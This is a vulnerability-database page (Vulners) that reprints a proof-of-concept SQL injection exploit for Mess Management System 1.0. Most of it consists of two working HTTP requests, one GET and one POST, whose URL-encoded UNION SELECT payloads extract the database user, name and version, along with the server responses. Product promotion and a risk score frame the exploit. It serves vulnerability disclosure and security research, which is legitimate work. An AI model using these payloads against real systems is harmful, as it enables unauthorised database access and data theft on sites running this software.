Vulners
Lucene search
Mess Management System 1.0 SQL Injection
`# Exploit Title: Mess Management System 1.0 - SQL Injection
# Dork: N/A
# Date: 2019-01-28
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.m.testbd.xyz/
# Software Link: https://www.sourcecodester.com/sites/default/files/download/biddut/ms_0.zip
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/index.php?mod=admin&pg=admin_form&id=[SQL]
#
GET /[PATH]/index.php?mod=admin&pg=admin_form&id=%2d%31%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%33%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=6bpo344k5sbed3vd2lc6tlgh80
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Date: Sat, 26 Jan 2019 21:31:38 GMT
Transfer-Encoding: chunked
# POC:
# 2)
# http://localhost/[PATH]/index.php?mod=BazarList&pg=BazarList_view
#
POST /[PATH]/index.php?mod=BazarList&pg=BazarList_view HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 228
Cookie: PHPSESSID=6bpo344k5sbed3vd2lc6tlgh80
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
qcari=%31%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%32%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%34%20%2d%2d%20%2d: undefined
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Date: Sat, 26 Jan 2019 21:33:39 GMT
Transfer-Encoding: chunked
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 Jan 2019 00:00Current
0.5Low risk
Vulners AI Score0.5